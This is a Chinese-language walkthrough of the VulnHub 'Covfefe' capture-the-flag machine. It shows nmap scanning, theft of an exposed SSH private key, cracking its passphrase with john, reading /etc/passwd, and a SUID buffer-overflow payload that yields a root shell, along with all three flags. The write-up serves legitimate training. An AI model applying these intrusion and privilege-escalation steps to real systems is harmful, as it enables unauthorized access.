靶机地址:https://www.vulnhub.com/entry/covfefe-1,199/
目标:取得 3 个 flag
注:由于一直换位置,导致IP有所变化,并非书写错误
一、主机发现
nmap -sP 192.168.31.0/24 |grep 192.168.31 |awk '{print($5)}'
发现目标IP:192.168.31.128
二、端口及服务发现
nmap -A -Pn -p1-65535 192.168.31.128
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 d06a10e0fb6322be09960b716a60ad1a (RSA)
| 256 ac2c111ee2d626ea58c43e2d3e1edd96 (ECDSA)
|_ 256 13b3dbc5af62c2b1607d2f48efc313fc (ED25519)
80/tcp open http nginx 1.10.3
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
|_http-title: 404 Not Found
| http-robots.txt: 3 disallowed entries
|_/.bashrc /.profile /taxes
|_http-server-header: Werkzeug/0.11.15 Python/3.5.3
MAC Address: 00:0C:29:43:A1:BB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
通过浏览器对80和31337端口进行访问并查看源代码无任何发现。
三、目录扫描
22端口
尝试root用户登录
The authenticity of host '192.168.31.128 (192.168.31.128)' can't be established.
ED25519 key fingerprint is SHA256:PSAUFRI+B3Kr1fbN9Nm3bV/ObPLCnoE6lKs9zCaeGdM.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.31.128' (ED25519) to the list of known hosts.
[email protected]: Permission denied (publickey).
翻译后发现公钥被拒绝
无法确定主机“192.168.31.128(192.168.31.128)”的真实性。
ED25519密钥指纹为SHA256:PSAUFRI+B3Kr1fbN9Nm3bV/ObPLCnoE6lKs9zCaeGdM。
此主机密钥由以下其他名称/地址已知:
~/.ssh/known_hosts:1:[哈希名称]
是否确实要继续连接(是/否/[指纹])?对
警告:已将“192.168.31.128”(ED25519)永久添加到已知主机列表中。
[email protected]:权限被拒绝(公钥)。
80端口
80啥也扫不到
31337端口
---- Scanning URL: http://192.168.31.128:31337/ ----
+ http://192.168.31.128:31337/.bash_history (CODE:200|SIZE:19)
+ http://192.168.31.128:31337/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.31.128:31337/.profile (CODE:200|SIZE:675)
+ http://192.168.31.128:31337/.ssh (CODE:200|SIZE:43)
+ http://192.168.31.128:31337/robots.txt (CODE:200|SIZE:70)
*robots.txt
直接查看robots.txt文件(.bashrc和.profile文件为环境配置文件,一般没啥用)
User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes
发现并访问taxes找到flag1
Good job! Here is a flag: flag1{make_america_great_again}
.ssh
查看.ssh文件发现目录列表
['id_rsa', 'authorized_keys', 'id_rsa.pub']
文件解读:
id_rsa:SSH私钥文件
authorized_keys:SSH比对文件
id_rsa.pub:SSH公钥文件
下载id_rsa和authorized_keys
查看authorized_keys文件发现SSH私钥用户名为simon
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzG6cWl499ZGW0PV+tRaOLguT8+lso8zbSLCzgiBYkX/xnoZx0fneSfi93gdh4ynVjs2sgZ2HaRWA05EGR7e3IetSP53NTxk5QrLHEGZQFLId3QMMi74ebGBpPkKg/QzwRxCrKgqL1b2+EYz68Y9InRAZoq8wYTLdoUVa2wOiJv0PfrlQ4e9nh29J7yPgXmVAsy5ZvmpBp5FL76y1lUblGUuftCfddh2IahevizLlVipuSQGFqRZOdA5xnxbsNO4QbFUhjIlA5RrAs814LuA9t2CiAzHXxjsVW8/R/eD8K22TO7XEQscQjaSl/R4Cr1kNtUwCljpmpjt/Q4DJmExOR simon@covfefe
四、SSH
尝试使用simon用户SSH指定私钥连接
ssh [email protected] -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
[email protected]: Permission denied (publickey).
翻译发现权限有问题(要求其他人不能访问您的私钥文件),并且需要私钥密码
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@警告:未受保护的私钥文件@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
“id_rsa”的权限0644太开放。
要求其他人不能访问您的私钥文件。
此私钥将被忽略。
加载密钥“id_rsa”:权限错误
[email protected]:权限被拒绝(公钥)。
赋予所需最低权限(100)
chmod 100 id_rsa
破解私钥密码
cd /usr/share/john/ # 进入john脚本文件存放目录
python ssh2john.py /root/id_rsa > /root/john_rsa # 用私钥文件生成HASH文件(john可识别文件)
john john_rsa # 爆破密码(starwars)
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
starwars (/root/id_rsa)
1g 0:00:00:00 DONE 2/3 (2023-02-16 09:49) 9.090g/s 175727p/s 175727c/s 175727C/s sniper..sunrise
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
再次使用simon用户私钥文件输入密码进行连接,SSH登录成功
ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
五、内网信息收集
内网权限搜集
发现自己为simon用户并且无root权限
simon@covfefe:~$ whoami
simon
simon@covfefe:~$ pwd
/home/simon
simon@covfefe:~$ id
uid=1000(simon) gid=1000(simon) groups=1000(simon),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
查看passwd文件,发现开放root用户
simon@covfefe:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
simon:x:1000:1000:,,,:/home/simon:/bin/bash
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
内网文件搜集
simon家目录
在http_server.py中存在已发现的flag1,经过查看其它文件基本无用
simon@covfefe:~$ ls -al
total 36
drwxr-xr-x 3 simon simon 4096 Jul 9 2017 .
drwxr-xr-x 3 root root 4096 Jun 28 2017 ..
-rw------- 1 simon simon 237 Feb 16 18:18 .bash_history
-rw-r--r-- 1 simon simon 220 Jun 28 2017 .bash_logout
-rw-r--r-- 1 simon simon 3526 Jun 28 2017 .bashrc
-rwxr-xr-x 1 simon simon 449 Jul 9 2017 http_server.py
-rw-r--r-- 1 simon simon 675 Jun 28 2017 .profile
-rw-r--r-- 1 simon simon 70 Jul 9 2017 robots.txt
drwx------ 2 simon simon 4096 Jun 28 2017 .ssh
simon@covfefe:~$ cat http_server.py
#!/usr/bin/env python3
from flask import Flask
from os import environ, listdir
root = environ['HOME']
sauce = '/.ssh'
app = Flask(__name__, static_folder=root, static_url_path='')
@app.route(sauce)
def sauce_content():
return str(listdir(root + sauce)), 200
@app.route('/taxes/')
def taxes_content():
return 'Good job! Here is a flag: flag1{make_america_great_again}'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=31337)
*root家目录
发现竟然可以访问root家目录
imon@covfefe:~$ cd /root/
simon@covfefe:/root$ ls -al
total 24
drwxr-xr-x 2 root root 4096 Jul 9 2017 .
drwxr-xr-x 21 root root 4096 Jun 28 2017 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw------- 1 root root 75 Jul 9 2017 flag.txt
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw-r--r-- 1 root root 767 Jul 9 2017 read_message.c
目前处于simon用户,flag.txt无访问权限,需要提权
-rw------- 1 root root 75 Jul 9 2017 flag.txt
查看read_message.c文件发现flag2并且发现惊喜。这是一个C语言编写的文件,并且存在非常经典的缓冲区溢出可以利用提权。通过char buf[20];发现当输入字符超出20个时,会执行20个字符后的内容;通过!strncmp(authorized, buf, 5)可以发现该文件只会对输入前五位字符进行判断。
flag2{use_the_source_luke}
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
int main(int argc, char *argv[]) {
char program[] = "/usr/local/sbin/message";
char buf[20];
char authorized[] = "Simon";
printf("What is your name?\n");
gets(buf);
// Only compare first five chars to save precious cycles:
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
} else {
printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
exit(EXIT_FAILURE);
}
}
检索可执行二进制文件
因为simon没有权限进行编译执行read_message.c,所以通过read_message.c查找simon用户可执行的二进制文件
find / -perm -4000 2> /dev/null
simon@covfefe:/root$ find / -perm -4000 2> /dev/null
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message
/bin/umount
/bin/su
/bin/mount
/bin/ping
查看/usr/local/bin/read_message具体信息,可执行权限为s,所以simon可执行read_message文件
simon@covfefe:/root$ ls -l /usr/local/bin/read_message
-rwsr-xr-x 1 root staff 7608 Jul 2 2017 /usr/local/bin/read_message
六、提权
执行read_message文件发现需要输入Simon
simon@covfefe:/root$ /usr/local/bin/read_message
What is your name?
K
Sorry K, you're not Simon! The Internet Police have been informed of this violation.
查看可用Shell终端
simon@covfefe:/root$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
结合之前对read_message.c文件的代码审计可构造语句(Shell终端慢慢试)
SimonXXXXXXXXXXXXXXX/bin/sh
simon@covfefe:/root$ /usr/local/bin/read_message
What is your name?
SimonXXXXXXXXXXXXXXX/bin/sh
Hello SimonXXXXXXXXXXXXXXX/bin/sh! Here is your message:
# whoami
root
# pwd
/root
# id
uid=1000(simon) gid=1000(simon) euid=0(root) groups=1000(simon),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
结合之前的内网信息收集,查看/root/目录下flag.txt文件发现最后一个flag
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
至此打靶完成,游戏结束OVO